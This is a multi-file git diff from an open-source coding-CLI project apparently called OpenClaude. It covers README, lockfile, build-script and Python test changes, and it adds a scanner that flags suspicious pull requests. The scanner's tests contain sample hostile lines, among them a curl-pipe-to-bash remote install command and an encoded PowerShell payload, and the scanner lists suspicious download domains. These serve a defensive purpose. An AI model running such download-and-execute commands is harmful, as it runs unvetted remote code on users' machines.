`WebFetch` works but uses basic HTTP plus HTML-to-markdown conversion. That fails on JavaScript-rendered pages (React, Next.js, Vue SPAs) and sites that block plain HTTP requests. `WebFetch` works, but its basic HTTP plus HTML-to-markdown path can still fail on JavaScript-rendered sites or sites that block plain HTTP requests.
Set a [Firecrawl](https://firecrawl.dev) API key if you want Firecrawl-powered search/fetch behavior: Set a [Firecrawl](https://firecrawl.dev) API key if you want Firecrawl-powered search/fetch behavior:
@@ -217,14 +180,12 @@ export FIRECRAWL_API_KEY=your-key-here
With Firecrawl enabled: With Firecrawl enabled:
- `WebSearch` can use Firecrawl's search API (while DuckDuckGo remains the default free path for non-Claude models) - `WebSearch` can use Firecrawl's search API while DuckDuckGo remains the default free path for non-Claude models
- `WebFetch` uses Firecrawl's scrape endpoint instead of raw HTTP, handling JS-rendered pages correctly - `WebFetch` uses Firecrawl's scrape endpoint instead of raw HTTP, handling JS-rendered pages correctly
Free tier at [firecrawl.dev](https://firecrawl.dev) includes 500 credits. The key is optional. Free tier at [firecrawl.dev](https://firecrawl.dev) includes 500 credits. The key is optional.
--- ## Source Build And Local Development
## Source Build
```bash ```bash
bun install bun install
@@ -235,22 +196,78 @@ node dist/cli.mjs
Helpful commands: Helpful commands:
- `bun run dev` - `bun run dev`
- `bun test`
- `bun run test:coverage`
- `bun run security:pr-scan -- --base origin/main`
- `bun run smoke` - `bun run smoke`
- `bun run doctor:runtime` - `bun run doctor:runtime`
- `bun run verify:privacy`
- focused `bun test ...` runs for the areas you touch
--- ## Testing And Coverage
OpenClaude uses Bun's built-in test runner for unit tests.
Run the full unit suite:
```bash
bun test
```
Generate unit test coverage:
```bash
bun run test:coverage
```
Open the visual coverage report:
```bash
open coverage/index.html
```
If you already have `coverage/lcov.info` and only want to rebuild the UI:
```bash
bun run test:coverage:ui
```
Use focused test runs when you only touch one area:
- `bun run test:provider`
- `bun run test:provider-recommendation`
- `bun test path/to/file.test.ts`
Recommended contributor validation before opening a PR:
- `bun run build`
- `bun run smoke`
- `bun run test:coverage` for broader unit coverage when your change affects shared runtime or provider logic
- focused `bun test ...` runs for the files and flows you changed
Coverage output is written to `coverage/lcov.info`, and OpenClaude also generates a git-activity-style heatmap at `coverage/index.html`.
## Repository Structure
- `src/` - core CLI/runtime
- `scripts/` - build, verification, and maintenance scripts
- `docs/` - setup, contributor, and project documentation
- `python/` - standalone Python helpers and their tests
- `vscode-extension/openclaude-vscode/` - VS Code extension
- `.github/` - repo automation, templates, and CI configuration
- `bin/` - CLI launcher entrypoints
## VS Code Extension ## VS Code Extension
The repo includes a VS Code extension in [`vscode-extension/openclaude-vscode`](vscode-extension/openclaude-vscode) for OpenClaude launch integration and theme support. The repo includes a VS Code extension in [`vscode-extension/openclaude-vscode`](vscode-extension/openclaude-vscode) for OpenClaude launch integration, provider-aware control-center UI, and theme support.
---
## Security ## Security
If you believe you found a security issue, see [SECURITY.md](SECURITY.md). If you believe you found a security issue, see [SECURITY.md](SECURITY.md).
--- ## Community
- Use [GitHub Discussions](https://github.com/Gitlawb/openclaude/discussions) for Q&A, ideas, and community conversation
- Use [GitHub Issues](https://github.com/Gitlawb/openclaude/issues) for confirmed bugs and actionable feature work
## Contributing ## Contributing
@@ -259,19 +276,16 @@ Contributions are welcome.
For larger changes, open an issue first so the scope is clear before implementation. Helpful validation commands include: For larger changes, open an issue first so the scope is clear before implementation. Helpful validation commands include:
- `bun run build` - `bun run build`
- `bun run test:coverage`
- `bun run smoke` - `bun run smoke`
- focused `bun test ...` runs for touched areas - focused `bun test ...` runs for touched areas
---
## Disclaimer ## Disclaimer
OpenClaude is an independent community project and is not affiliated with, endorsed by, or sponsored by Anthropic. OpenClaude is an independent community project and is not affiliated with, endorsed by, or sponsored by Anthropic.
"Claude" and "Claude Code" are trademarks of Anthropic. OpenClaude originated from the Claude Code codebase and has since been substantially modified to support multiple providers and open use. "Claude" and "Claude Code" are trademarks of Anthropic PBC. See [LICENSE](LICENSE) for details.
---
## License ## License
MIT See [LICENSE](LICENSE).

View File

@@ -1,7 +1,13 @@
import { join } from 'path' import { join, win32 } from 'path'
import { pathToFileURL } from 'url' import { pathToFileURL } from 'url'
export function getDistImportSpecifier(baseDir) { export function getDistImportSpecifier(baseDir) {
const distPath = join(baseDir, '..', 'dist', 'cli.mjs') if (/^[A-Za-z]:\\/.test(baseDir)) {
const distPath = win32.join(baseDir, '..', 'dist', 'cli.mjs')
return `file:///${distPath.replace(/\\/g, '/')}`
}
const joinImpl = join
const distPath = joinImpl(baseDir, '..', 'dist', 'cli.mjs')
return pathToFileURL(distPath).href return pathToFileURL(distPath).href
} }

View File

@@ -36,6 +36,7 @@
"cli-highlight": "2.1.11", "cli-highlight": "2.1.11",
"code-excerpt": "4.0.0", "code-excerpt": "4.0.0",
"commander": "12.1.0", "commander": "12.1.0",
"cross-spawn": "7.0.6",
"diff": "8.0.3", "diff": "8.0.3",
"duck-duck-scrape": "^2.2.7", "duck-duck-scrape": "^2.2.7",
"emoji-regex": "10.6.0", "emoji-regex": "10.6.0",
@@ -50,7 +51,7 @@
"ignore": "7.0.5", "ignore": "7.0.5",
"indent-string": "5.0.0", "indent-string": "5.0.0",
"jsonc-parser": "3.3.1", "jsonc-parser": "3.3.1",
"lodash-es": "4.18.0", "lodash-es": "4.18.1",
"lru-cache": "11.2.7", "lru-cache": "11.2.7",
"marked": "15.0.12", "marked": "15.0.12",
"p-map": "7.0.4", "p-map": "7.0.4",
@@ -87,6 +88,9 @@
}, },
}, },
}, },
"overrides": {
"lodash-es": "4.18.1",
},
"packages": { "packages": {
"@alcalzone/ansi-tokenize": ["@alcalzone/ansi-tokenize@0.3.0", "", { "dependencies": { "ansi-styles": "^6.2.1", "is-fullwidth-code-point": "^5.0.0" } }, "sha512-p+CMKJ93HFmLkjXKlXiVGlMQEuRb6H0MokBSwUsX+S6BRX8eV5naFZpQJFfJHjRZY0Hmnqy1/r6UWl3x+19zYA=="], "@alcalzone/ansi-tokenize": ["@alcalzone/ansi-tokenize@0.3.0", "", { "dependencies": { "ansi-styles": "^6.2.1", "is-fullwidth-code-point": "^5.0.0" } }, "sha512-p+CMKJ93HFmLkjXKlXiVGlMQEuRb6H0MokBSwUsX+S6BRX8eV5naFZpQJFfJHjRZY0Hmnqy1/r6UWl3x+19zYA=="],
@@ -656,7 +660,7 @@
"locate-path": ["locate-path@5.0.0", "", { "dependencies": { "p-locate": "^4.1.0" } }, "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g=="], "locate-path": ["locate-path@5.0.0", "", { "dependencies": { "p-locate": "^4.1.0" } }, "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g=="],
"lodash-es": ["lodash-es@4.18.0", "", {}, "sha512-koAgswPPA+UTaPN64Etp+PGP+WT6oqOS2NMi5yDkMaiGw9qY4VxQbQF0mtKMyr4BlTznWyzePV5UpECTJQmSUA=="], "lodash-es": ["lodash-es@4.18.1", "", {}, "sha512-J8xewKD/Gk22OZbhpOVSwcs60zhd95ESDwezOFuA3/099925PdHJ7OFHNTGtajL3AlZkykD32HykiMo+BIBI8A=="],
"lodash.camelcase": ["lodash.camelcase@4.3.0", "", {}, "sha512-TwuEnCnxbc3rAvhf/LbG7tJUDzhqXyFnv3dtzLOPgCG/hODL7WFnsbwktkD7yUV0RrreP/l1PALq/YSg6VvjlA=="], "lodash.camelcase": ["lodash.camelcase@4.3.0", "", {}, "sha512-TwuEnCnxbc3rAvhf/LbG7tJUDzhqXyFnv3dtzLOPgCG/hODL7WFnsbwktkD7yUV0RrreP/l1PALq/YSg6VvjlA=="],
@@ -890,8 +894,6 @@
"zod-to-json-schema": ["zod-to-json-schema@3.25.2", "", { "peerDependencies": { "zod": "^3.25.28 || ^4" } }, "sha512-O/PgfnpT1xKSDeQYSCfRI5Gy3hPf91mKVDuYLUHZJMiDFptvP41MSnWofm8dnCm0256ZNfZIM7DSzuSMAFnjHA=="], "zod-to-json-schema": ["zod-to-json-schema@3.25.2", "", { "peerDependencies": { "zod": "^3.25.28 || ^4" } }, "sha512-O/PgfnpT1xKSDeQYSCfRI5Gy3hPf91mKVDuYLUHZJMiDFptvP41MSnWofm8dnCm0256ZNfZIM7DSzuSMAFnjHA=="],
"@anthropic-ai/sandbox-runtime/lodash-es": ["lodash-es@4.17.23", "", {}, "sha512-kVI48u3PZr38HdYz98UmfPnXl2DXrpdctLrFLCd3kOx1xUkOmpFPx7gCWWM5MPkL/fD8zb+Ph0QzjGFs4+hHWg=="],
"@aws-crypto/crc32/@aws-crypto/util": ["@aws-crypto/util@5.2.0", "", { "dependencies": { "@aws-sdk/types": "^3.222.0", "@smithy/util-utf8": "^2.0.0", "tslib": "^2.6.2" } }, "sha512-4RkU9EsI6ZpBve5fseQlGNUWKMa1RLPQ1dnjnQoe07ldfIzcsGb5hC5W0Dm7u423KWzawlrpbjXBrXCEv9zazQ=="], "@aws-crypto/crc32/@aws-crypto/util": ["@aws-crypto/util@5.2.0", "", { "dependencies": { "@aws-sdk/types": "^3.222.0", "@smithy/util-utf8": "^2.0.0", "tslib": "^2.6.2" } }, "sha512-4RkU9EsI6ZpBve5fseQlGNUWKMa1RLPQ1dnjnQoe07ldfIzcsGb5hC5W0Dm7u423KWzawlrpbjXBrXCEv9zazQ=="],
"@aws-crypto/crc32/tslib": ["tslib@2.8.1", "", {}, "sha512-oJFu94HQb+KVduSUQL7wnpmqnfmLsOA/nAh6b6EH0wCEoK0/mPeXU6c3wKDV83MkOuHPRHtSXKKU99IBazS/2w=="], "@aws-crypto/crc32/tslib": ["tslib@2.8.1", "", {}, "sha512-oJFu94HQb+KVduSUQL7wnpmqnfmLsOA/nAh6b6EH0wCEoK0/mPeXU6c3wKDV83MkOuHPRHtSXKKU99IBazS/2w=="],

View File

@@ -1,6 +1,6 @@
{ {
"name": "@gitlawb/openclaude", "name": "@gitlawb/openclaude",
"version": "0.1.7", "version": "0.1.8",
"description": "Claude Code opened to any LLM — OpenAI, Gemini, DeepSeek, Ollama, and 200+ models", "description": "Claude Code opened to any LLM — OpenAI, Gemini, DeepSeek, Ollama, and 200+ models",
"type": "module", "type": "module",
"bin": { "bin": {
@@ -31,6 +31,10 @@
"dev:fast": "bun run profile:fast && bun run dev:ollama:fast", "dev:fast": "bun run profile:fast && bun run dev:ollama:fast",
"dev:code": "bun run profile:code && bun run dev:profile", "dev:code": "bun run profile:code && bun run dev:profile",
"start": "node dist/cli.mjs", "start": "node dist/cli.mjs",
"test": "bun test",
"test:coverage": "bun test --coverage --coverage-reporter=lcov --coverage-dir=coverage --max-concurrency=1 && bun run scripts/render-coverage-heatmap.ts",
"test:coverage:ui": "bun run scripts/render-coverage-heatmap.ts",
"security:pr-scan": "bun run scripts/pr-intent-scan.ts",
"test:provider-recommendation": "bun test src/utils/providerRecommendation.test.ts src/utils/providerProfile.test.ts", "test:provider-recommendation": "bun test src/utils/providerRecommendation.test.ts src/utils/providerProfile.test.ts",
"typecheck": "tsc --noEmit", "typecheck": "tsc --noEmit",
"smoke": "bun run build && node dist/cli.mjs --version", "smoke": "bun run build && node dist/cli.mjs --version",
@@ -76,6 +80,7 @@
"cli-highlight": "2.1.11", "cli-highlight": "2.1.11",
"code-excerpt": "4.0.0", "code-excerpt": "4.0.0",
"commander": "12.1.0", "commander": "12.1.0",
"cross-spawn": "7.0.6",
"diff": "8.0.3", "diff": "8.0.3",
"duck-duck-scrape": "^2.2.7", "duck-duck-scrape": "^2.2.7",
"emoji-regex": "10.6.0", "emoji-regex": "10.6.0",
@@ -90,7 +95,7 @@
"ignore": "7.0.5", "ignore": "7.0.5",
"indent-string": "5.0.0", "indent-string": "5.0.0",
"jsonc-parser": "3.3.1", "jsonc-parser": "3.3.1",
"lodash-es": "4.18.0", "lodash-es": "4.18.1",
"lru-cache": "11.2.7", "lru-cache": "11.2.7",
"marked": "15.0.12", "marked": "15.0.12",
"p-map": "7.0.4", "p-map": "7.0.4",
@@ -145,5 +150,8 @@
"license": "SEE LICENSE FILE", "license": "SEE LICENSE FILE",
"publishConfig": { "publishConfig": {
"access": "public" "access": "public"
},
"overrides": {
"lodash-es": "4.18.1"
} }
} }

1
python/__init__.py Normal file
View File

@@ -0,0 +1 @@
# Python helper package for standalone provider-side utilities.

1
python/tests/__init__.py Normal file
View File

@@ -0,0 +1 @@
# Pytest package marker for the Python helper test suite.

5
python/tests/conftest.py Normal file
View File

@@ -0,0 +1,5 @@
from pathlib import Path
import sys
# Make the sibling `python/` helper modules importable from this test package.
sys.path.insert(0, str(Path(__file__).resolve().parents[1]))

View File

@@ -1,6 +1,6 @@
""" """
test_atomic_chat_provider.py test_atomic_chat_provider.py
Run: pytest test_atomic_chat_provider.py -v Run: pytest python/tests/test_atomic_chat_provider.py -v
""" """
import pytest import pytest

View File

@@ -1,6 +1,6 @@
""" """
test_ollama_provider.py test_ollama_provider.py
Run: pytest test_ollama_provider.py -v Run: pytest python/tests/test_ollama_provider.py -v
""" """
import pytest import pytest
@@ -13,25 +13,31 @@ from ollama_provider import (
check_ollama_running, check_ollama_running,
) )
def test_normalize_strips_prefix(): def test_normalize_strips_prefix():
assert normalize_ollama_model("ollama/llama3:8b") == "llama3:8b" assert normalize_ollama_model("ollama/llama3:8b") == "llama3:8b"
def test_normalize_no_prefix(): def test_normalize_no_prefix():
assert normalize_ollama_model("codellama:34b") == "codellama:34b" assert normalize_ollama_model("codellama:34b") == "codellama:34b"
def test_normalize_empty(): def test_normalize_empty():
assert normalize_ollama_model("") == "" assert normalize_ollama_model("") == ""
def test_converts_string_content(): def test_converts_string_content():
messages = [{"role": "user", "content": "Hello!"}] messages = [{"role": "user", "content": "Hello!"}]
result = anthropic_to_ollama_messages(messages) result = anthropic_to_ollama_messages(messages)
assert result == [{"role": "user", "content": "Hello!"}] assert result == [{"role": "user", "content": "Hello!"}]
def test_converts_text_block_list(): def test_converts_text_block_list():
messages = [{"role": "user", "content": [{"type": "text", "text": "What is Python?"}]}] messages = [{"role": "user", "content": [{"type": "text", "text": "What is Python?"}]}]
result = anthropic_to_ollama_messages(messages) result = anthropic_to_ollama_messages(messages)
assert result[0]["content"] == "What is Python?" assert result[0]["content"] == "What is Python?"
def test_converts_image_block_to_placeholder(): def test_converts_image_block_to_placeholder():
messages = [{"role": "user", "content": [{"type": "image", "source": {}}, {"type": "text", "text": "Describe this"}]}] messages = [{"role": "user", "content": [{"type": "image", "source": {}}, {"type": "text", "text": "Describe this"}]}]
result = anthropic_to_ollama_messages(messages) result = anthropic_to_ollama_messages(messages)
@@ -68,6 +74,7 @@ def test_converts_multi_turn():
assert len(result) == 3 assert len(result) == 3
assert result[1]["role"] == "assistant" assert result[1]["role"] == "assistant"
@pytest.mark.asyncio @pytest.mark.asyncio
async def test_ollama_running_true(): async def test_ollama_running_true():
mock_response = MagicMock() mock_response = MagicMock()
@@ -77,6 +84,7 @@ async def test_ollama_running_true():
result = await check_ollama_running() result = await check_ollama_running()
assert result is True assert result is True
@pytest.mark.asyncio @pytest.mark.asyncio
async def test_ollama_running_false_on_exception(): async def test_ollama_running_false_on_exception():
with patch("ollama_provider.httpx.AsyncClient") as MockClient: with patch("ollama_provider.httpx.AsyncClient") as MockClient:
@@ -84,6 +92,7 @@ async def test_ollama_running_false_on_exception():
result = await check_ollama_running() result = await check_ollama_running()
assert result is False assert result is False
@pytest.mark.asyncio @pytest.mark.asyncio
async def test_list_models_returns_names(): async def test_list_models_returns_names():
mock_response = MagicMock() mock_response = MagicMock()
@@ -95,6 +104,7 @@ async def test_list_models_returns_names():
models = await list_ollama_models() models = await list_ollama_models()
assert "llama3:8b" in models assert "llama3:8b" in models
@pytest.mark.asyncio @pytest.mark.asyncio
async def test_ollama_chat_returns_anthropic_format(): async def test_ollama_chat_returns_anthropic_format():
mock_response = MagicMock() mock_response = MagicMock()
@@ -115,9 +125,11 @@ async def test_ollama_chat_returns_anthropic_format():
assert result["role"] == "assistant" assert result["role"] == "assistant"
assert "42" in result["content"][0]["text"] assert "42" in result["content"][0]["text"]
@pytest.mark.asyncio @pytest.mark.asyncio
async def test_ollama_chat_prepends_system(): async def test_ollama_chat_prepends_system():
captured = {} captured = {}
async def mock_post(url, json=None, **kwargs): async def mock_post(url, json=None, **kwargs):
captured.update(json or {}) captured.update(json or {})
m = MagicMock() m = MagicMock()
@@ -134,7 +146,7 @@ async def test_ollama_chat_prepends_system():
await ollama_chat( await ollama_chat(
model="llama3:8b", model="llama3:8b",
messages=[{"role": "user", "content": "Hi"}], messages=[{"role": "user", "content": "Hi"}],
system="Be helpful." system="Be helpful.",
) )
assert captured["messages"][0]["role"] == "system" assert captured["messages"][0]["role"] == "system"
assert "helpful" in captured["messages"][0]["content"] assert "helpful" in captured["messages"][0]["content"]

View File

@@ -2,7 +2,7 @@
test_smart_router.py test_smart_router.py
-------------------- --------------------
Tests for the SmartRouter. Tests for the SmartRouter.
Run: pytest test_smart_router.py -v Run: pytest python/tests/test_smart_router.py -v
""" """
import pytest import pytest
@@ -18,6 +18,7 @@ from smart_router import SmartRouter, Provider
def fake_api_key(monkeypatch): def fake_api_key(monkeypatch):
monkeypatch.setenv("FAKE_KEY", "test-key") monkeypatch.setenv("FAKE_KEY", "test-key")
def make_provider(name, healthy=True, configured=True, def make_provider(name, healthy=True, configured=True,
latency=100.0, cost=0.002, errors=0, requests=0): latency=100.0, cost=0.002, errors=0, requests=0):
p = Provider( p = Provider(
@@ -33,7 +34,7 @@ def make_provider(name, healthy=True, configured=True,
p.error_count = errors p.error_count = errors
p.request_count = requests p.request_count = requests
if not configured: if not configured:
p.api_key_env = "" # makes is_configured False for non-ollama p.api_key_env = "" # makes is_configured False for non-local providers
return p return p

View File

@@ -3,7 +3,7 @@
* distributable JS file using Bun's bundler. * distributable JS file using Bun's bundler.
* *
* Handles: * Handles:
* - bun:bundle feature() flags → all false (disables internal-only features) * - bun:bundle feature() flags for the open build
* - MACRO.* globals → inlined version/build-time constants * - MACRO.* globals → inlined version/build-time constants
* - src/ path aliases * - src/ path aliases
*/ */
@@ -14,8 +14,9 @@ import { noTelemetryPlugin } from './no-telemetry-plugin'
const pkg = JSON.parse(readFileSync('./package.json', 'utf-8')) const pkg = JSON.parse(readFileSync('./package.json', 'utf-8'))
const version = pkg.version const version = pkg.version
// Feature flags — all disabled for the open build. // Feature flags for the open build.
// These gate Anthropic-internal features (voice, proactive, kairos, etc.) // Most Anthropic-internal features stay off; open-build features can be
// selectively enabled here when their full source exists in the mirror.
const featureFlags: Record<string, boolean> = { const featureFlags: Record<string, boolean> = {
VOICE_MODE: false, VOICE_MODE: false,
PROACTIVE: false, PROACTIVE: false,
@@ -37,7 +38,7 @@ const featureFlags: Record<string, boolean> = {
TRANSCRIPT_CLASSIFIER: false, TRANSCRIPT_CLASSIFIER: false,
WEB_BROWSER_TOOL: false, WEB_BROWSER_TOOL: false,
MESSAGE_ACTIONS: false, MESSAGE_ACTIONS: false,
BUDDY: false, BUDDY: true,
CHICAGO_MCP: false, CHICAGO_MCP: false,
COWORKER_TYPE_TELEMETRY: false, COWORKER_TYPE_TELEMETRY: false,
} }
@@ -110,7 +111,7 @@ export async function handleBgFlag() { throw new Error("Background sessions are
build.onLoad( build.onLoad(
{ filter: /.*/, namespace: 'bun-bundle-shim' }, { filter: /.*/, namespace: 'bun-bundle-shim' },
() => ({ () => ({
contents: `export function feature(name) { return false; }`, contents: `const featureFlags = ${JSON.stringify(featureFlags)};\nexport function feature(name) { return featureFlags[name] ?? false; }`,
loader: 'js', loader: 'js',
}), }),
) )
@@ -250,6 +251,103 @@ export const SeverityNumber = {};
loader: 'js', loader: 'js',
}), }),
) )
// Pre-scan: find all missing modules that need stubbing
// (Bun's onResolve corrupts module graph even when returning null,
// so we use exact-match resolvers instead of catch-all patterns)
const fs = require('fs')
const pathMod = require('path')
const srcDir = pathMod.resolve(__dirname, '..', 'src')
const missingModules = new Set<string>()
const missingModuleExports = new Map<string, Set<string>>()
// Known missing external packages
for (const pkg of [
'@ant/computer-use-mcp',
'@ant/computer-use-mcp/sentinelApps',
'@ant/computer-use-mcp/types',
'@ant/computer-use-swift',
'@ant/computer-use-input',
]) {
missingModules.add(pkg)
}
// Scan source to find imports that can't resolve
function scanForMissingImports() {
function walk(dir: string) {
for (const ent of fs.readdirSync(dir, { withFileTypes: true })) {
const full = pathMod.join(dir, ent.name)
if (ent.isDirectory()) { walk(full); continue }
if (!/\.(ts|tsx)$/.test(ent.name)) continue
const code: string = fs.readFileSync(full, 'utf-8')
// Collect all imports
for (const m of code.matchAll(/import\s+(?:\{([^}]*)\}|(\w+))?\s*(?:,\s*\{([^}]*)\})?\s*from\s+['"](.*?)['"]/g)) {
const specifier = m[4]
const namedPart = m[1] || m[3] || ''
const names = namedPart.split(',')
.map((s: string) => s.trim().replace(/^type\s+/, ''))
.filter((s: string) => s && !s.startsWith('type '))
// Check src/tasks/ non-relative imports
if (specifier.startsWith('src/tasks/')) {
const resolved = pathMod.resolve(__dirname, '..', specifier)
const candidates = [
resolved,
`${resolved}.ts`, `${resolved}.tsx`,
resolved.replace(/\.js$/, '.ts'), resolved.replace(/\.js$/, '.tsx'),
pathMod.join(resolved, 'index.ts'), pathMod.join(resolved, 'index.tsx'),
]
if (!candidates.some((c: string) => fs.existsSync(c))) {
missingModules.add(specifier)
}
}
// Check relative .js imports
else if (specifier.endsWith('.js') && (specifier.startsWith('./') || specifier.startsWith('../'))) {
const dir2 = pathMod.dirname(full)
const resolved = pathMod.resolve(dir2, specifier)
const tsVariant = resolved.replace(/\.js$/, '.ts')
const tsxVariant = resolved.replace(/\.js$/, '.tsx')
if (!fs.existsSync(resolved) && !fs.existsSync(tsVariant) && !fs.existsSync(tsxVariant)) {
missingModules.add(specifier)
}
}
// Track named exports for missing modules
if (names.length > 0) {
if (!missingModuleExports.has(specifier)) missingModuleExports.set(specifier, new Set())
for (const n of names) missingModuleExports.get(specifier)!.add(n)
}
}
}
}
walk(srcDir)
}
scanForMissingImports()
// Register exact-match resolvers for each missing module
for (const mod of missingModules) {
const escaped = mod.replace(/[.*+?^${}()|[\]\\]/g, '\\$&')
build.onResolve({ filter: new RegExp(`^${escaped}$`) }, () => ({
path: mod,
namespace: 'missing-module-stub',
}))
}
build.onLoad(
{ filter: /.*/, namespace: 'missing-module-stub' },
(args) => {
const names = missingModuleExports.get(args.path) ?? new Set()
const exports = [...names].map(n => `export const ${n} = noop;`).join('\n')
return {
contents: `
const noop = () => null;
export default noop;
${exports}
`,
loader: 'js',
}
},
)
}, },
}, },
], ],

View File

@@ -203,6 +203,60 @@ export async function submitTranscriptShare() { return { success: false }; }
'services/internalLogging': ` 'services/internalLogging': `
export async function logPermissionContextForAnts() {} export async function logPermissionContextForAnts() {}
export const getContainerId = async () => null; export const getContainerId = async () => null;
`,
// ─── Deleted Anthropic-internal modules ───────────────────────────────
'services/api/dumpPrompts': `
export function createDumpPromptsFetch() { return undefined; }
export function getDumpPromptsPath() { return ''; }
export function getLastApiRequests() { return []; }
export function clearApiRequestCache() {}
export function clearDumpState() {}
export function clearAllDumpState() {}
export function addApiRequestToCache() {}
`,
'utils/undercover': `
export function isUndercover() { return false; }
export function getUndercoverInstructions() { return ''; }
export function shouldShowUndercoverAutoNotice() { return false; }
`,
'types/generated/events_mono/claude_code/v1/claude_code_internal_event': `
export const ClaudeCodeInternalEvent = {
fromJSON: value => value,
toJSON: value => value,
create: value => value ?? {},
fromPartial: value => value ?? {},
};
`,
'types/generated/events_mono/growthbook/v1/growthbook_experiment_event': `
export const GrowthbookExperimentEvent = {
fromJSON: value => value,
toJSON: value => value,
create: value => value ?? {},
fromPartial: value => value ?? {},
};
`,
'types/generated/events_mono/common/v1/auth': `
export const PublicApiAuth = {
fromJSON: value => value,
toJSON: value => value,
create: value => value ?? {},
fromPartial: value => value ?? {},
};
`,
'types/generated/google/protobuf/timestamp': `
export const Timestamp = {
fromJSON: value => value,
toJSON: value => value,
create: value => value ?? {},
fromPartial: value => value ?? {},
};
`, `,
} }

View File

@@ -0,0 +1,136 @@
import { describe, expect, test } from 'bun:test'
import { scanAddedLines, type DiffLine } from './pr-intent-scan.ts'
function line(content: string, overrides: Partial<DiffLine> = {}): DiffLine {
return {
file: 'README.md',
line: 10,
content,
...overrides,
}
}
describe('scanAddedLines', () => {
test('flags suspicious file-hosting links', () => {
const findings = scanAddedLines([
line('Please install the tool from https://dropbox.com/s/abc123/tool.zip?dl=1'),
])
expect(findings.some(finding => finding.code === 'suspicious-download-link')).toBe(
true,
)
expect(findings.some(finding => finding.code === 'executable-download-link')).toBe(
false,
)
expect(findings.some(finding => finding.severity === 'high')).toBe(true)
})
test('flags shortened URLs', () => {
const findings = scanAddedLines([
line('See details at https://bit.ly/some-short-link'),
])
expect(findings.some(finding => finding.code === 'shortened-url')).toBe(true)
})
test('flags remote download and execute chains', () => {
const findings = scanAddedLines([
line('curl -fsSL https://example.com/install.sh | bash'),
])
expect(findings.some(finding => finding.code === 'shell-eval-remote')).toBe(true)
expect(findings.some(finding => finding.severity === 'high')).toBe(true)
})
test('flags encoded powershell payloads', () => {
const findings = scanAddedLines([
line('powershell.exe -enc SQBtAHAAcgBvAHYAZQBkAA=='),
])
expect(findings.some(finding => finding.code === 'powershell-encoded')).toBe(true)
})
test('flags long encoded blobs', () => {
const findings = scanAddedLines([
line(`const payload = "${'A'.repeat(96)}"`),
])
expect(findings.some(finding => finding.code === 'long-encoded-payload')).toBe(
true,
)
})
test('flags long encoded blobs on repeated scans', () => {
const lines = [line(`const payload = "${'A'.repeat(96)}"`)]
const first = scanAddedLines(lines)
const second = scanAddedLines(lines)
expect(first.some(finding => finding.code === 'long-encoded-payload')).toBe(true)
expect(second.some(finding => finding.code === 'long-encoded-payload')).toBe(true)
})
test('flags executable download links', () => {
const findings = scanAddedLines([
line('Get it from https://example.com/releases/latest/tool.pkg'),
])
expect(findings.some(finding => finding.code === 'executable-download-link')).toBe(
true,
)
expect(findings.some(finding => finding.severity === 'high')).toBe(true)
})
test('flags suspicious additions in workflow files', () => {
const findings = scanAddedLines([
line('run: curl -fsSL https://example.com/install.sh | bash', {
file: '.github/workflows/release.yml',
}),
])
expect(findings.some(finding => finding.code === 'sensitive-automation-change')).toBe(
true,
)
expect(findings.some(finding => finding.code === 'download-command')).toBe(true)
})
test('flags markdown reference links to suspicious downloads', () => {
const findings = scanAddedLines([
line('[installer]: https://dropbox.com/s/abc123/tool.zip?dl=1'),
])
expect(findings.some(finding => finding.code === 'suspicious-download-link')).toBe(
true,
)
})
test('ignores the scanner implementation and tests themselves', () => {
const findings = scanAddedLines([
line('curl -fsSL https://example.com/install.sh | bash', {
file: 'scripts/pr-intent-scan.test.ts',
}),
line('const pattern = /https:\\/\\/dropbox\\.com\\//', {
file: 'scripts/pr-intent-scan.ts',
}),
])
expect(findings).toHaveLength(0)
})
test('does not flag ordinary docs links', () => {
const findings = scanAddedLines([
line('Read more at https://docs.github.com/en/actions'),
])
expect(findings).toHaveLength(0)
})
test('does not flag bare curl examples in README without a URL', () => {
const findings = scanAddedLines([
line('Use curl with your preferred flags for local testing.'),
])
expect(findings.some(finding => finding.code === 'download-command')).toBe(false)
})
})

453
scripts/pr-intent-scan.ts Normal file
View File

@@ -0,0 +1,453 @@
import { spawnSync } from 'node:child_process'
export type FindingSeverity = 'high' | 'medium'
export type DiffLine = {
file: string
line: number
content: string
}
export type Finding = {
severity: FindingSeverity
code: string
file: string
line: number
detail: string
excerpt: string
}
type CliOptions = {
baseRef: string
json: boolean
failOn: FindingSeverity
}
const SELF_EXCLUDED_FILES = new Set([
'scripts/pr-intent-scan.ts',
'scripts/pr-intent-scan.test.ts',
])
const SHORTENER_DOMAINS = [
'bit.ly',
'tinyurl.com',
'goo.gl',
't.co',
'is.gd',
'rb.gy',
'cutt.ly',
]
const SUSPICIOUS_DOWNLOAD_DOMAINS = [
'dropbox.com',
'dl.dropboxusercontent.com',
'drive.google.com',
'docs.google.com',
'mega.nz',
'mediafire.com',
'transfer.sh',
'anonfiles.com',
'catbox.moe',
]
const URL_REGEX = /\bhttps?:\/\/[^\s)>"']+/gi
const LONG_BASE64_REGEX = /\b(?:[A-Za-z0-9+/]{80,}={0,2}|[A-Za-z0-9_-]{80,})\b/
const EXECUTABLE_PATH_REGEX =
/\.(?:sh|bash|zsh|ps1|exe|msi|pkg|deb|rpm|zip|tar|tgz|gz|xz|dmg|appimage)(?:$|[?#])/i
const SENSITIVE_PATH_REGEX =
/^(?:\.github\/workflows\/|scripts\/|bin\/|install(?:\/|\.|$)|.*(?:Dockerfile|docker-compose|compose\.ya?ml)$)/i
function parseOptions(argv: string[]): CliOptions {
const options: CliOptions = {
baseRef: 'origin/main',
json: false,
failOn: 'high',
}
for (let index = 0; index < argv.length; index++) {
const arg = argv[index]
if (arg === '--json') {
options.json = true
continue
}
if (arg === '--base') {
const next = argv[index + 1]
if (next && !next.startsWith('--')) {
options.baseRef = next
index++
}
continue
}
if (arg === '--fail-on') {
const next = argv[index + 1]
if (next === 'high' || next === 'medium') {
options.failOn = next
index++
}
}
}
return options
}
function trimExcerpt(content: string): string {
const compact = content.trim().replace(/\s+/g, ' ')
return compact.length > 140 ? `${compact.slice(0, 137)}...` : compact
}
function uniqueFindings(findings: Finding[]): Finding[] {
const seen = new Set<string>()
return findings.filter(finding => {
const key = `${finding.code}:${finding.file}:${finding.line}:${finding.detail}`
if (seen.has(key)) {
return false
}
seen.add(key)
return true
})
}
function parseAddedLines(diffText: string): DiffLine[] {
